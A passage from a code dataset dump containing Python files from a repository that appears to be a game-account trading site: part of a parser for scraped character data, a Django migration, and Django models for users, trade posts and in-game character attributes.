result[\"desc\"] = info[\"desc\"]\n\n return result\n\n def _get_lock_types(self, equip):\n locks = []\n if equip.get(\"iLock\"):\n locks.append(equip[\"iLock\"])\n if equip.get(\"iLockNew\"):\n locks.append(equip[\"iLockNew\"])\n\n return locks\n\n def _parse_equip_info(self, AllEquip):\n result = {}\n\n ResUrl = self.ResUrl\n\n all_equips = AllEquip\n\n get_equip_small_icon = lambda itype: ResUrl + \"/images/equip/small/\" + str(itype) + \".gif\"\n\n get_equip_big_icon = lambda itype: ResUrl + \"/images/big/\" + 
str(itype) + \".gif\"\n\n using_equips = []\n not_using_equips = []\n for equip in all_equips:\n equip_info = self._get_equip_info(all_equips[equip][\"iType\"])\n info = {\n \"pos\": int(equip),\n \"type\": all_equips[equip][\"iType\"],\n \"name\": equip_info[\"name\"],\n \"desc\": all_equips[equip][\"cDesc\"],\n \"lock_type\": self._get_lock_types(all_equips[equip]),\n \"static_desc\": equip_info[\"desc\"].replace(r'#R', '<br />').replace(r'#r', '<br />'),\n \"small_icon\": get_equip_small_icon(all_equips[equip][\"iType\"]),\n \"big_icon\": get_equip_big_icon(all_equips[equip][\"iType\"])\n }\n\n pos = int(equip)\n if (pos >= 1 and pos <= 6) or (pos in [187, 188, 189, 190]):\n using_equips.append(info)\n else:\n not_using_equips.append(info)\n\n result[\"using_equips\"] = using_equips\n result[\"not_using_equips\"] = not_using_equips\n return result\n\n def _get_fabao_info(self, typeid):\n info = setting.fabao_info.get(int(typeid))\n result = {\n \"name\": \"\",\n \"desc\": \"\"\n }\n if info:\n result[\"name\"] = info[\"name\"]\n result[\"desc\"] = info[\"desc\"]\n\n return result\n\n def _parse_fabao_info(self, fabao):\n result = {}\n ResUrl = self.ResUrl\n all_fabao = fabao\n get_fabao_icon = lambda itype: ResUrl + \"/images/fabao_new2/\" + str(itype) + \".png\"\n\n using_fabao = []\n\n nousing_fabao = []\n for pos in all_fabao:\n fabao_info = self._get_fabao_info(all_fabao[pos][\"iType\"])\n\n info = {\n \"pos\": int(pos),\n \"type\": all_fabao[pos][\"iType\"],\n \"name\": fabao_info[\"name\"],\n \"desc\": all_fabao[pos][\"cDesc\"],\n \"icon\": get_fabao_icon(all_fabao[pos][\"iType\"]),\n \"static_desc\": fabao_info[\"desc\"]\n }\n if info.get('desc'):\n info['desc'] = info['desc'][1:] if info['desc'].startswith('0') else info['desc']\n\n if int(pos) >= 1 and int(pos) <= 4:\n using_fabao.append(info)\n else:\n nousing_fabao.append(info)\n\n nousing_fabao.sort(key=lambda x: x['pos'])\n result[\"using_fabao\"] = using_fabao\n result[\"nousing_fabao\"] = nousing_fabao\n return result\n\n def parse_tool(self):\n '''\n 解析道具/法宝\n :return: 返回道具法宝字典\n '''\n tools = {}\n equip_result = self._parse_equip_info(self.json_data[\"AllEquip\"])\n fabao_result = self._parse_fabao_info(self.json_data[\"fabao\"])\n tools['equip_result'] = equip_result\n tools['fabao_result'] = fabao_result\n return tools\n\n def _safe_attr(self, attr_value, default_value=None):\n if not attr_value:\n return default_value if default_value != None else \"未知\"\n return attr_value\n\n def _parse_pet_info(self, info, pet):\n ResUrl = self.ResUrl\n\n get_pet_icon = lambda itype: ResUrl + \"/images/pets/small/\" + str(itype) + \".gif\"\n\n max_equip_num = 3\n\n get_pet_skill_icon = lambda skill_id: ResUrl + \"/images/pet_child_skill/\" + self._make_img_name(\n skill_id) + \".gif\"\n\n get_pet_equip_icon = lambda typeid: ResUrl + \"/images/equip/small/\" + str(typeid) + \".gif\"\n\n get_pet_shipin_icon = lambda typeid: ResUrl + \"/images/pet_shipin/small/\" + str(typeid) + \".png\"\n\n get_child_icon = lambda child_id: ResUrl + \"/images/child_icon/\" + self._make_img_name(child_id) + \".gif\"\n\n get_child_skill_icon = lambda skill_id: ResUrl + \"/images/pet_child_skill/\" + self._make_img_name(\n skill_id) + \".gif\"\n\n get_pet_name = lambda itype: setting.pet_info.get(itype)\n\n get_child_name = lambda itype: setting.child_info.get(itype)\n\n get_ending_name = lambda itype: setting.ending_info.get(itype)\n\n get_neidan_icon = lambda neidan_id: ResUrl + \"/images/neidan/\" + str(neidan_id) + '.jpg'\n\n info['pet_icon'] = 
get_pet_icon(pet['iType'])\n\n info[\"genius\"] = pet[\"iGenius\"]\n if info[\"genius\"] != 0:\n info[\"genius_skill\"] = {\n \"icon\": get_pet_skill_icon(pet[\"iGenius\"]),\n \"skill_type\": pet[\"iGenius\"]\n }\n else:\n info[\"genius_skill\"] = {}\n\n info[\"skill_list\"] = []\n all_skills = pet[\"all_skills\"]\n if all_skills:\n all_skill_str = []\n for typeid in all_skills:\n all_skill_str.append(str(typeid))\n if (int(typeid) == info[\"genius\"]):\n continue\n info[\"skill_list\"].append({\n \"icon\": get_pet_skill_icon(typeid),\n \"skill_type\": typeid,\n \"level\": all_skills[typeid]})\n\n info['all_skill'] = '|'.join(all_skill_str)\n else:\n info['all_skill'] = ''\n\n info['all_skills'] = info['all_skill'].split('|')\n\n info[\"equip_list\"] = []\n for i in range(max_equip_num):\n item = pet.get(\"summon_equip\" + str((i + 1)))\n if item:\n equip_name_info = self._get_equip_info(item[\"iType\"])\n info[\"equip_list\"].append({\n \"name\": equip_name_info[\"name\"],\n \"icon\": get_pet_equip_icon(item[\"iType\"]),\n \"type\": item[\"iType\"],\n \"desc\": item[\"cDesc\"],\n \"lock_type\": self._get_lock_types(item),\n \"static_desc\": equip_name_info[\"desc\"].replace(r'#R', '<br />').replace(r'#r', '<br />')\n })\n else:\n info[\"equip_list\"].append(None)\n\n info[\"neidan\"] = []\n if pet[\"summon_core\"]:\n for p in pet[\"summon_core\"]:\n p_core = pet[\"summon_core\"][p]\n info[\"neidan\"].append({\n \"name\": self._safe_attr(setting.PetNeidanInfo[int(p)]),\n \"icon\": get_neidan_icon(p),\n \"level\": p_core[0],\n 'itype': p\n })\n\n def parse_bb(self):\n '''\n 解析宝宝\n :return: 返回宝宝字典\n '''\n allSummon = self.json_data['AllSummon']\n pet_list = []\n\n if not allSummon: return\n for pet in allSummon:\n info = {}\n info[\"iTypeid\"] = pet[\"iType\"]\n # 类型\n info[\"iType\"] = setting.pet_info[pet[\"iType\"]]\n # 气血\n info[\"iHp\"] = pet[\"iHp\"]\n # 魔法\n info[\"iMp\"] = pet[\"iMp\"]\n # 攻击\n info[\"iAtt_all\"] = pet[\"iAtt_all\"]\n # 防御\n info[\"iDef_All\"] = pet[\"iDef_All\"]\n # 速度\n info[\"iDex_All\"] = pet[\"iDex_All\"]\n # 灵力\n info[\"iMagDef_all\"] = pet[\"iMagDef_all\"]\n # 寿命\n info[\"life\"] = pet[\"life\"]\n # 已用元宵\n info[\"yuanxiao\"] = pet[\"yuanxiao\"]\n # 已用炼兽珍经\n info[\"lianshou\"] = pet[\"lianshou\"]\n # 已用清灵仙露\n info[\"left_qlxl\"] = pet[\"left_qlxl\"]\n # 等级\n info[\"iGrade\"] = pet[\"iGrade\"]\n # 体质\n info[\"iCor_all\"] = pet[\"iCor_all\"]\n # 法力\n info[\"iMag_all\"] = pet[\"iMag_all\"]\n # 力量\n info[\"iStr_all\"] = pet[\"iStr_all\"]\n # 耐力\n info[\"iRes_all\"] = pet[\"iRes_all\"]\n # 敏捷\n info[\"iSpe_all\"] = pet[\"iSpe_all\"]\n # 潜能\n info[\"iPoint\"] = pet[\"iPoint\"]\n # 成长\n info[\"grow\"] = pet[\"grow\"] / 1000\n # 已用如意的\n info[\"ruyidan\"] = pet[\"ruyidan\"]\n # 是否宝宝\n info[\"iBaobao\"] = pet[\"iBaobao\"]\n # 攻击资质\n info[\"att\"] = pet[\"att\"]\n # 防御资质\n info[\"def\"] = pet[\"def\"]\n # 体力资质\n info[\"hp\"] = pet[\"hp\"]\n # 法力资质\n info[\"mp\"] = pet[\"mp\"]\n # 速度资质\n info[\"spe\"] = pet[\"spe\"]\n # 躲闪资质\n info[\"dod\"] = pet[\"dod\"]\n # 已用千金露\n info[\"qianjinlu\"] = pet[\"qianjinlu\"]\n # 灵性\n info[\"lx\"] = pet[\"jinjie\"]['lx']\n\n # 技能\n self._parse_pet_info(info, pet)\n\n pet_list.append(info)\n\n return pet_list\n\n def _parse_rider_info(self, raw_info):\n ResUrl = self.ResUrl\n rider_name_info = setting.rider_info\n\n get_rider_icon = lambda itype: ResUrl + \"/images/riders/\" + str(itype) + \".gif\"\n\n get_skill_icon = lambda typeid: ResUrl + \"/images/rider_skill/\" + self._make_img_name(typeid) + \".gif\"\n\n all_rider = 
raw_info.get(\"AllRider\") or {}\n\n result = []\n for rider in all_rider:\n rider_info = raw_info[\"AllRider\"][rider]\n info = {\n \"type\": rider_info[\"iType\"],\n \"grade\": rider_info[\"iGrade\"],\n \"exgrow\": rider_info[\"exgrow\"] / 10000,\n \"icon\": get_rider_icon(rider_info[\"iType\"]),\n \"type_name\": self._safe_attr(rider_name_info[str(rider_info[\"iType\"])]),\n \"mattrib\": rider_info[\"mattrib\"] if rider_info.get(\"mattrib\") else \"未选择\",\n }\n info[\"all_skills\"] = []\n all_skills = rider_info[\"all_skills\"]\n for typeid in all_skills:\n info[\"all_skills\"].append({\n \"type\": typeid,\n \"icon\": get_skill_icon(typeid),\n \"grade\": all_skills[typeid]\n })\n\n result.append(info)\n\n return result\n\n def parse_rider_info(self):\n '''\n 解析坐骑\n :return: 返回坐骑字典\n '''\n return self._parse_rider_info(self.json_data)\n\n def _parse_xiangrui_info(self, raw_info):\n ResUrl = self.ResUrl\n\n all_xiangrui_info = setting.xiangrui_info\n\n all_skills = setting.xiangrui_skill\n\n nosale_xiangrui = setting.nosale_xiangrui\n\n get_xiangrui_icon = lambda itype: ResUrl + \"/images/xiangrui/\" + str(itype) + \".gif\"\n\n get_skill_icon = lambda: ResUrl + \"/images/xiangrui_skills/1.gif\"\n\n all_xiangrui = raw_info.get(\"HugeHorse\")\n if not all_xiangrui:\n return\n\n result = []\n for pos in all_xiangrui:\n xiangrui_info = all_xiangrui[pos]\n itype = xiangrui_info[\"iType\"]\n info = {\n \"type\": itype,\n \"name\": xiangrui_info['cName'] or self._safe_attr(all_xiangrui_info[itype]),\n \"icon\": get_xiangrui_icon(itype),\n \"skill_name\": all_skills.get(xiangrui_info['iSkill'], '无'),\n \"order\": xiangrui_info[\"order\"]\n }\n if xiangrui_info[\"iSkillLevel\"]:\n info[\"skill_level\"] = str(xiangrui_info[\"iSkillLevel\"]) + \"级\"\n else:\n info[\"skill_level\"] = \"\"\n\n result.append(info)\n\n # result.sort(key=lambda x :x['order'])\n return result\n\n def parse_xiangrui_info(self):\n '''\n 解析祥瑞\n :return:返回祥瑞字典\n '''\n return self._parse_xiangrui_info(self.json_data)\n\n def _parse_clothes_info(self, raw_info):\n ResUrl = self.ResUrl\n all_clothes_info = setting.clothes_info\n get_clothes_icon = lambda itype: ResUrl + \"/images/clothes/\" + str(itype) + \"0000.gif\"\n\n def get_cloth_name_desc(itype):\n if all_clothes_info.get(itype):\n return all_clothes_info[itype]\n else:\n return {\n \"name\": \"\",\n \"desc\": \"\"\n }\n\n all_clothes = raw_info[\"ExAvt\"]\n if not all_clothes:\n return\n\n result = []\n for pos in all_clothes:\n clothes_info = all_clothes[pos]\n clothe_name = clothes_info.get('cName') or self._safe_attr(all_clothes_info[clothes_info[\"iType\"]])\n info = {\n \"type\": clothes_info[\"iType\"],\n \"name\": clothe_name,\n \"icon\": get_clothes_icon(clothes_info[\"iType\"]),\n \"order\": clothes_info[\"order\"],\n \"static_desc\": \"\"\n }\n result.append(info)\n\n return result\n\n def parse_clothes_info(self):\n '''解析锦衣'''\n return self._parse_clothes_info(self.json_data)\n\n def start_parse(self):\n '''开始解析所有字段'''\n result = {}\n result['role_info'] = self.parse_role()\n result['skill_info'] = self.parse_skill()\n result['tool_info'] = self.parse_tool()\n result['pet_info'] = self.parse_bb()\n result['rider_info'] = self.parse_rider_info()\n result['xiangrui_info'] = self.parse_xiangrui_info()\n result['clothes_info'] = self.parse_clothes_info()\n\n return result\n"
},
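
A note on the parser record above: `_parse_equip_info` decides whether an item is equipped purely from its slot number (slots 1-6 plus the ornament slots 187-190). A minimal, self-contained sketch of that rule (the `all_equips` shape is assumed from how the parser indexes it):

```python
# Sketch of the slot rule in _parse_equip_info: slots 1-6 and 187-190 count
# as equipped, everything else as carried. The all_equips shape is assumed:
# a dict mapping slot-number strings to item dicts with an "iType" field.
USING_SLOTS = set(range(1, 7)) | {187, 188, 189, 190}

def split_equips(all_equips):
    using, not_using = [], []
    for pos_str, item in all_equips.items():
        pos = int(pos_str)
        (using if pos in USING_SLOTS else not_using).append(
            {"pos": pos, "type": item["iType"]})
    return using, not_using

print(split_equips({"3": {"iType": 100}, "42": {"iType": 200}}))
# ([{'pos': 3, 'type': 100}], [{'pos': 42, 'type': 200}])
```
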
{
"alpha_fraction": 0.5159574747085571,
"alphanum_fraction": 0.576241135597229,
"avg_line_length": 24.636363983154297,
"blob_id": "831586c8f9212a1ee2fe4fc0ced9589085396ed6",
"content_id": "f332b83665055cae557301f31faf9e7f3fafebaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 22,
"path": "/dbmodels/migrations/0010_auto_20180918_0842.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-18 00:42\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0009_auto_20180918_0835'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='rightnav',\n options={'verbose_name': '右侧导航', 'verbose_name_plural': '右侧导航'},\n ),\n migrations.AddField(\n model_name='rightnav',\n name='icon',\n field=models.CharField(blank=True, max_length=100, null=True),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7032864689826965,
"alphanum_fraction": 0.7088193893432617,
"avg_line_length": 45.01226806640625,
"blob_id": "02a416251b3d5994df87a4ff05bc0a06d46970e1",
"content_id": "154d225fb023a21652a111d78beb1b4a0e3c8183",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15751,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 326,
"path": "/dbmodels/models.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import AbstractUser\n# Create your models here.\n\n\nfrom dbmodels.manager import ShowImgManager, RightNavManager, MenuManager, TransactionManager\n\n\nclass UserInfo(AbstractUser):\n '''用户信息表'''\n REQUIRED_FIELDS = ['nikename','email','sex']\n sex_choices = ((1,'男'),\n (2,'女'),)\n\n nikename = models.CharField(max_length=64,unique=True)\n # pwd = models.CharField(max_length=64)\n # nickname = models.CharField(max_length=16)\n sex = models.IntegerField(choices=sex_choices,null=True,blank=True)\n # email = models.EmailField()\n header_img = models.ImageField(null=True,blank=True)\n\n\n def get_absolute_url(self):\n return '1'\n\nclass Friends(models.Model):\n '''好友表'''\n user = models.OneToOneField('UserInfo',primary_key=True,on_delete=models.CASCADE)\n friend = models.ForeignKey('self',on_delete=models.CASCADE)\n\n\nclass Transaction(models.Model):\n '''交易帖子'''\n objects = TransactionManager()\n stat_choices = ((0, '售出'), (1, '上架'),)\n\n team = models.CharField('队伍',max_length=64)\n img = models.ImageField(upload_to='indeximg',null=True,blank=True)\n create_time = models.DateTimeField(auto_now_add=True)\n stat = models.IntegerField(choices=stat_choices,default=1)\n\n user = models.ForeignKey('UserInfo',on_delete=models.CASCADE)\n\n\n\n class Meta:\n verbose_name_plural = '交易帖子'\n verbose_name = '交易帖子'\n\n def __str__(self):\n return '%s' % (self.team,)\n\n\n\nclass Reply(models.Model):\n '''回复表'''\n count = models.IntegerField()\n user = models.ForeignKey('UserInfo',on_delete=models.CASCADE)\n transaction = models.ForeignKey('Transaction',on_delete=models.CASCADE)\n\nclass Collection(models.Model):\n '''收藏表'''\n count = models.IntegerField()\n user = models.ForeignKey('UserInfo',on_delete=models.CASCADE)\n transaction = models.ForeignKey('Transaction',on_delete=models.CASCADE)\n\nclass Watch(models.Model):\n '''查看表'''\n count = models.IntegerField()\n user = models.ForeignKey('UserInfo',on_delete=models.CASCADE)\n transaction = models.ForeignKey('Transaction',on_delete=models.CASCADE)\n\nclass ShowImg(models.Model):\n objects = ShowImgManager()\n\n stat_choices = ((0,'下架'),(1,'上架'),)\n img_type_choices = ((0,'轮播'),(1,'最热'),(2,'最新'))\n\n img_type = models.IntegerField(choices=img_type_choices,default=3)\n stat = models.IntegerField(choices=stat_choices,default=1)\n top = models.BooleanField(default=False)\n transcation = models.OneToOneField('Transaction',on_delete=models.CASCADE)\n\n class Meta:\n verbose_name_plural = '首页图片'\n verbose_name = '首页图片'\n\n def __str__(self):\n return '%s:%s' % (self.get_img_type_display(),self.transcation.team)\n\nclass RightNav(models.Model):\n objects = RightNavManager()\n stat_choices = ((0, '下架'), (1, '上架'),)\n\n title = models.CharField(max_length=10)\n stat = models.IntegerField(choices=stat_choices, default=1)\n icon = models.CharField(max_length=100,null=True,blank=True)\n\n class Meta:\n verbose_name_plural = '右侧导航'\n verbose_name = '右侧导航'\n\n def __str__(self):\n return '%s:%s' % (self.title,self.get_stat_display())\n\nclass Menu(models.Model):\n objects = MenuManager()\n stat_choices = ((0, '下架'), (1, '上架'),)\n\n title = models.CharField(max_length=10)\n url = models.CharField(max_length=100,null=True,blank=True)\n parent_menu = models.ForeignKey('self',on_delete=models.CASCADE,null=True,blank=True,related_name='child')\n stat = models.IntegerField(choices=stat_choices, default=1)\n\n class Meta:\n verbose_name_plural = '菜单'\n verbose_name = '菜单'\n\n def __str__(self):\n return 
'%s:%s' % (self.title,self.get_stat_display())\n\n\n\n\n\nclass RoleBase(models.Model):\n eid = models.CharField(max_length=64)\n equip_name = models.CharField(max_length=16)\n\n transaction = models.ForeignKey(to='Transaction',on_delete=models.CASCADE)\n\n class Meta:\n unique_together = ('eid', 'equip_name',)\n\nclass Role(models.Model):\n role_base = models.OneToOneField('RoleBase',on_delete=models.CASCADE)\n\n iGrade = models.IntegerField(verbose_name='等级', null=True, blank=True)\n cName = models.CharField(verbose_name='名称', max_length=10, null=True, blank=True)\n roleKindName = models.CharField(verbose_name='角色', max_length=6, null=True, blank=True)\n iPride = models.IntegerField(verbose_name='人气', null=True, blank=True)\n cOrg = models.CharField(verbose_name='帮派', max_length=10, null=True, blank=True)\n iOrgOffer = models.IntegerField(verbose_name='帮贡', null=True, blank=True)\n iSchool = models.CharField(verbose_name='门派', max_length=4, null=True, blank=True)\n iSchOffer = models.IntegerField(verbose_name='门贡', null=True, blank=True)\n iHp_Max = models.IntegerField(verbose_name='气血', null=True, blank=True)\n iCor_All = models.IntegerField(verbose_name='体质', null=True, blank=True)\n iMp_Max = models.IntegerField(verbose_name='魔法', null=True, blank=True)\n iMag_All = models.IntegerField(verbose_name='魔力', null=True, blank=True)\n iAtt_All = models.IntegerField(verbose_name='命中', null=True, blank=True)\n iStr_All = models.IntegerField(verbose_name='力量', null=True, blank=True)\n iDamage_All = models.IntegerField(verbose_name='伤害', null=True, blank=True)\n iRes_All = models.IntegerField(verbose_name='耐力', null=True, blank=True)\n iDef_All = models.IntegerField(verbose_name='防御', null=True, blank=True)\n iSpe_All = models.IntegerField(verbose_name='敏捷', null=True, blank=True)\n iDex_All = models.IntegerField(verbose_name='速度', null=True, blank=True)\n iPoint = models.IntegerField(verbose_name='潜力', null=True, blank=True)\n iTotalMagDam_all = models.IntegerField(verbose_name='法伤', null=True, blank=True)\n iTotalMagDef_all = models.IntegerField(verbose_name='法防', null=True, blank=True)\n iUpExp = models.IntegerField(verbose_name='获得经验', null=True, blank=True)\n iNutsNum = models.IntegerField(verbose_name='已用潜能果数量', null=True, blank=True)\n TA_iAllNewPoint = models.IntegerField(verbose_name='新版乾元丹数量', null=True, blank=True)\n sum_exp = models.IntegerField(verbose_name='总经验', null=True, blank=True)\n addPoint = models.IntegerField(verbose_name='月饼粽子食用量', null=True, blank=True)\n ori_race = models.IntegerField(verbose_name='原始种族', null=True, blank=True)\n jiyuan = models.IntegerField(verbose_name='已获得机缘属性', null=True, blank=True)\n fly_status = models.CharField(verbose_name='飞升/渡劫/化圣', max_length=6, null=True, blank=True)\n changesch = models.CharField(verbose_name='历史门派', max_length=12, null=True, blank=True)\n propKept = models.CharField(verbose_name='属性保存方案', max_length=10, null=True, blank=True)\n\nclass Practice(models.Model):\n role_base = models.OneToOneField('RoleBase', on_delete=models.CASCADE)\n\n iExptSki1 = models.IntegerField(verbose_name='攻击修炼', null=True, blank=True)\n iExptSki2 = models.IntegerField(verbose_name='防御修炼', null=True, blank=True)\n iExptSki3 = models.IntegerField(verbose_name='法术修炼', null=True, blank=True)\n iExptSki4 = models.IntegerField(verbose_name='抗法修炼', null=True, blank=True)\n iExptSki5 = models.IntegerField(verbose_name='猎术修炼', null=True, blank=True)\n yu_shou_shu = models.IntegerField(verbose_name='育兽术', null=True, blank=True)\n iBeastSki1 = 
models.IntegerField(verbose_name='攻击控制力', null=True, blank=True)\n iBeastSki2 = models.IntegerField(verbose_name='防御控制力', null=True, blank=True)\n iBeastSki3 = models.IntegerField(verbose_name='法术控制力', null=True, blank=True)\n iBeastSki4 = models.IntegerField(verbose_name='抗法控制力', null=True, blank=True)\n\nclass Home(models.Model):\n role_base = models.OneToOneField('RoleBase', on_delete=models.CASCADE)\n fangwu = models.CharField(verbose_name='房屋', max_length=4, null=True, blank=True)\n muchang = models.CharField(verbose_name='牧场', max_length=2, null=True, blank=True)\n tingyuan = models.CharField(verbose_name='庭院', max_length=4, null=True, blank=True)\n shequ = models.CharField(verbose_name='社区', max_length=2, null=True, blank=True)\n\nclass Score(models.Model):\n role_base = models.OneToOneField('RoleBase', on_delete=models.CASCADE)\n HeroScore = models.IntegerField(verbose_name='比武积分', null=True, blank=True)\n sword_score = models.IntegerField(verbose_name='剑会积分', null=True, blank=True)\n datang_feat = models.IntegerField(verbose_name='三界功绩', null=True, blank=True)\n\nclass Skill(models.Model):\n role_base = models.ForeignKey('RoleBase',on_delete=models.CASCADE)\n\n skill_type_choices = ((1,'师门技能'),(2,'生活技能'),(3,'剧情技能'),)\n skill_type = models.IntegerField(choices=skill_type_choices)\n\n from spider.setting import skill\n school_skill_choices = [(int(i),j['name']) for i,j in skill['school_skill'].items()]\n school_skill = models.IntegerField(choices=school_skill_choices,null=True, blank=True)\n\n life_skill_choices = [(int(i),j) for i,j in skill['life_skill'].items()]\n life_skill = models.IntegerField(choices=life_skill_choices,null=True, blank=True)\n\n ju_qing_skill_choices = [(int(i),j) for i,j in skill['ju_qing_skill'].items()]\n ju_qing_skill = models.IntegerField(choices=ju_qing_skill_choices,null=True, blank=True)\n\n skill_grade = models.IntegerField(null=True, blank=True)\n\nfrom spider.setting import equip_info\nequip_choices = [(int(i),j['name']) for i,j in equip_info.items()]\nclass Tool(models.Model):\n role_base = models.ForeignKey('RoleBase',on_delete=models.CASCADE)\n\n tool_type_choices = ((0,'装备灵饰'),(1,'装备'),(2,'未装备'),(3,'法宝'),(4,'未装备法宝'))\n tool_type = models.IntegerField(choices=tool_type_choices)\n\n lingshi = models.IntegerField(choices=equip_choices,null=True, blank=True)\n equip = models.IntegerField(choices=equip_choices,null=True, blank=True)\n no_equip = models.IntegerField(choices=equip_choices,null=True, blank=True)\n\n from spider.setting import fabao_info\n fabao_choices = [(int(i),j['name']) for i,j in fabao_info.items()]\n fabao = models.IntegerField(choices=fabao_choices,null=True, blank=True)\n no_fabao = models.IntegerField(choices=fabao_choices,null=True, blank=True)\n\n desc = models.TextField(null=True, blank=True)\n\nclass Pet(models.Model):\n role_base = models.ForeignKey('RoleBase',on_delete=models.CASCADE)\n\n from spider.setting import pet_info\n iType_choices = [(int(i),j) for i,j in pet_info.items()]\n iType = models.IntegerField(verbose_name='类型',choices=iType_choices,null=True,blank=True)\n\n iHp = models.IntegerField(verbose_name='气血',null=True,blank=True)\n iMp = models.IntegerField(verbose_name='魔法',null=True,blank=True)\n iAtt_all = models.IntegerField(verbose_name='攻击',null=True,blank=True)\n iDef_All = models.IntegerField(verbose_name='防御',null=True,blank=True)\n iDex_All = models.IntegerField(verbose_name='速度',null=True,blank=True)\n iMagDef_all = models.IntegerField(verbose_name='灵力',null=True,blank=True)\n life = 
models.IntegerField(verbose_name='寿命',null=True,blank=True)\n yuanxiao = models.IntegerField(verbose_name='已用元宵',null=True,blank=True)\n lianshou = models.IntegerField(verbose_name='已用炼兽珍经',null=True,blank=True)\n left_qlxl = models.IntegerField(verbose_name='已用清灵仙露',null=True,blank=True)\n iGrade = models.IntegerField(verbose_name='等级',null=True,blank=True)\n iCor_all = models.IntegerField(verbose_name='体质',null=True,blank=True)\n iMag_all = models.IntegerField(verbose_name='法力',null=True,blank=True)\n iStr_all = models.IntegerField(verbose_name='力量',null=True,blank=True)\n iRes_all = models.IntegerField(verbose_name='耐力',null=True,blank=True)\n iSpe_all = models.IntegerField(verbose_name='敏捷',null=True,blank=True)\n iPoint = models.IntegerField(verbose_name='潜能',null=True,blank=True)\n ruyidan = models.IntegerField(verbose_name='已用如意丹',null=True,blank=True)\n iBaobao = models.IntegerField(verbose_name='是否宝宝',null=True,blank=True)\n att = models.IntegerField(verbose_name='攻击资质',null=True,blank=True)\n def_zz = models.IntegerField(verbose_name='防御资质',null=True,blank=True)\n hp = models.IntegerField(verbose_name='体力资质',null=True,blank=True)\n mp = models.IntegerField(verbose_name='法力资质',null=True,blank=True)\n spe = models.IntegerField(verbose_name='速度资质',null=True,blank=True)\n dod = models.IntegerField(verbose_name='躲闪资质',null=True,blank=True)\n qianjinlu = models.IntegerField(verbose_name='已用千金露',null=True,blank=True)\n lx = models.IntegerField(verbose_name='灵性',null=True,blank=True)\n petSkills = models.CharField(verbose_name='所有技能',null=True,blank=True,max_length=64)\n\nclass PetSkill(models.Model):\n role_base = models.ForeignKey('Pet',on_delete=models.CASCADE)\n\n skill_type_choices = ((1,'认证技能'),(2,'技能'),)\n skill_type = models.IntegerField(choices=skill_type_choices)\n\n from spider.setting import PetSkillInfo\n pet_skill_choices = [(int(i),j) for i,j in PetSkillInfo.items()]\n pet_skill = models.IntegerField(choices=pet_skill_choices,null=True, blank=True)\n genius_skill = models.IntegerField(choices=pet_skill_choices,null=True, blank=True)\n\nclass PetEquip(models.Model):\n role_base = models.ForeignKey('Pet',on_delete=models.CASCADE)\n\n pet_equip = models.IntegerField(choices=equip_choices,null=True, blank=True)\n desc = models.TextField(null=True, blank=True)\n\nclass PetNeiDan(models.Model):\n role_base = models.ForeignKey('Pet',on_delete=models.CASCADE)\n\n from spider.setting import PetNeidanInfo\n pet_neidan_choices = [(int(i),j) for i,j in PetNeidanInfo.items()]\n pet_neidan = models.IntegerField(choices=pet_neidan_choices,null=True, blank=True)\n\n level = models.IntegerField(null=True, blank=True)\n\nclass Rider(models.Model):\n role_base = models.ForeignKey('RoleBase',on_delete=models.CASCADE)\n\n from spider.setting import rider_info\n rider_choices = [(int(i),j) for i,j in rider_info.items()]\n rider = models.IntegerField(choices=rider_choices,null=True, blank=True)\n\n grade = models.IntegerField(verbose_name='等级',null=True, blank=True)\n exgrow = models.FloatField(verbose_name='成长',null=True, blank=True)\n mattrib = models.CharField(verbose_name='属性',null=True, blank=True,max_length=16)\n\nclass RiderSkill(models.Model):\n role_base = models.ForeignKey('Rider',on_delete=models.CASCADE)\n\n itype = models.IntegerField(verbose_name='类型', null=True, blank=True)\n grade = models.IntegerField(verbose_name='等级', null=True, blank=True)\n\nclass XiangRui(models.Model):\n role_base = models.ForeignKey('RoleBase',on_delete=models.CASCADE)\n\n from spider.setting import 
xiangrui_info\n xiangrui_choices = [(int(i),j) for i,j in xiangrui_info.items()]\n xiangrui = models.IntegerField(choices=xiangrui_choices,null=True, blank=True)\n\n skill = models.CharField(verbose_name='技能',null=True, blank=True,max_length=16)\n\nclass clothes(models.Model):\n role_base = models.ForeignKey('RoleBase',on_delete=models.CASCADE)\n\n name = models.CharField(verbose_name='名字',null=True, blank=True,max_length=16)\n\n"
},
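
models.py above builds every Django `choices` list with the same comprehension over the spider's setting dicts. A small stand-alone sketch of that idiom; the sample `equip_info` here is invented, the real one lives in `spider/setting.py`:

```python
# Invented stand-in for spider.setting.equip_info; the real dict is loaded
# from the spider's settings module.
equip_info = {"1001": {"name": "example sword", "desc": "..."},
              "1002": {"name": "example armor", "desc": "..."}}

# The comprehension models.py uses to turn such dicts into Django choices.
equip_choices = [(int(i), j["name"]) for i, j in equip_info.items()]
print(equip_choices)  # [(1001, 'example sword'), (1002, 'example armor')]
```
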
{
"alpha_fraction": 0.498834490776062,
"alphanum_fraction": 0.5268065333366394,
"avg_line_length": 30.77777862548828,
"blob_id": "b7706cb4a054fb0cfe8af148db44e690526c8a66",
"content_id": "c66214a6fbddacb94fc9d4f971b373dcaa00e82a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 878,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 27,
"path": "/dbmodels/migrations/0002_auto_20180917_1902.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
